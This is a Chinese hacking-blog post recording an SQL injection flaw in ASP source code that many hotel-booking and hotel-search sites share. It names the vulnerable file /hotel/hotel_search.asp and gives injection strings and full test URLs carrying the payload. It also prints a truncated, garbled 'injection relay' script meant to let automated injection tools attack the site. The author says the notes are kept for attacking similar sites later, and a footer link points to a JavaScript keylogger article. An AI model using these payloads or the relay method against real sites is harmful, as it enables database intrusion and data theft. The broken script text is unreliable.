酒店、宾馆预定,酒店查询,酒店网站 SQL 注入漏洞

  • A+
所属分类:lcx

酒店、宾馆预定,酒店查询,酒店网站 SQL 注入漏洞。

私人脚本漏洞库放的老玩意儿,很久了,之前干一个站,总结的一点资料,方便日后干同类型的站,很多宾馆预订、酒店查询类的网站都用这套源码,这个漏洞比较菜,勿喷。。。

我个人喜欢总结每次渗透的资料,越详细越好。


漏洞名称:

酒店、宾馆预定,酒店查询,酒店网站 SQL 注入漏洞

发现时间:

2011年8月28日, 01:54:11

漏洞文件:

/hotel/hotel_search.asp

利用条件:

Null

漏洞原因:

文件:/hotel/hotel_search.asp,没有过滤提交参数,导致任意注入。

网站内很多文件均存在此漏洞,不止这一个。

Sql查询语句为:

select * form table where ( name='关键词' and minPrice >0 and minPrice

关键词:' and minPrice >0 Or ''='

漏洞测试:

1、https://lcx.cc/hotel/hotel_search.asp?cid=2&intime=2011-8-28&outtime=2011-8-31&p1=0&p2=100000&jdld=0&key_name='%20or%20''='

2、https://lcx.cc/hotel/hotel_search.asp?cid=2&intime=2011-8-28&outtime=2011-8-31&p1=0&p2=100000&jdld=0&key_name='%20and%20minPrice>218%20or%20''='

漏洞利用:

1、由于注入语句比较特别,无法使用工具直接跑,需使用注入中转:index.asp。

2、使用方法(需先修改文件中的URL地址):http://127.0.0.1/index.asp?sql=SQL语句

注意事项:

1、Null

其他信息:

Null

index.asp 注入中转脚本源码:


" Response.Write "select * form table where ( name='" & Sql & "' and minPrice >0 and minPrice " Response.BinaryWrite Xml.ResponseBody Response.End '----------------------------------------------------------------' '功能描述:URL编码函数 '输入参数:中英文混合字符串,f是否对ASCII字符编码 '返回值:编码后的ASC字符串 Public Function UrlEncoding(v, f) 'URL编码 Dim s, t, i, j, h, l, x: s = "": x = Len(v) For i = 1 To x t = Mid(v, i, 1): j = Asc(t) If j > 0 Then If f Then s = s & "%" & Right("00" & Hex(Asc(t)), 2) Else s = s & t End If Else If j

文章来源于lcx.cc:酒店、宾馆预定,酒店查询,酒店网站 SQL 注入漏洞

相关推荐: js 实现键盘记录,兼容 FireFox 和 IE

另外一篇文章,Xss高级技巧劫持键盘:http://www.xssxss.com/fuck/285.xss From:http://hi.baidu.com/%D3%F0%E9%E4%C8%CA/blog/item/2922c9e9bed5b238b90e2d…

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: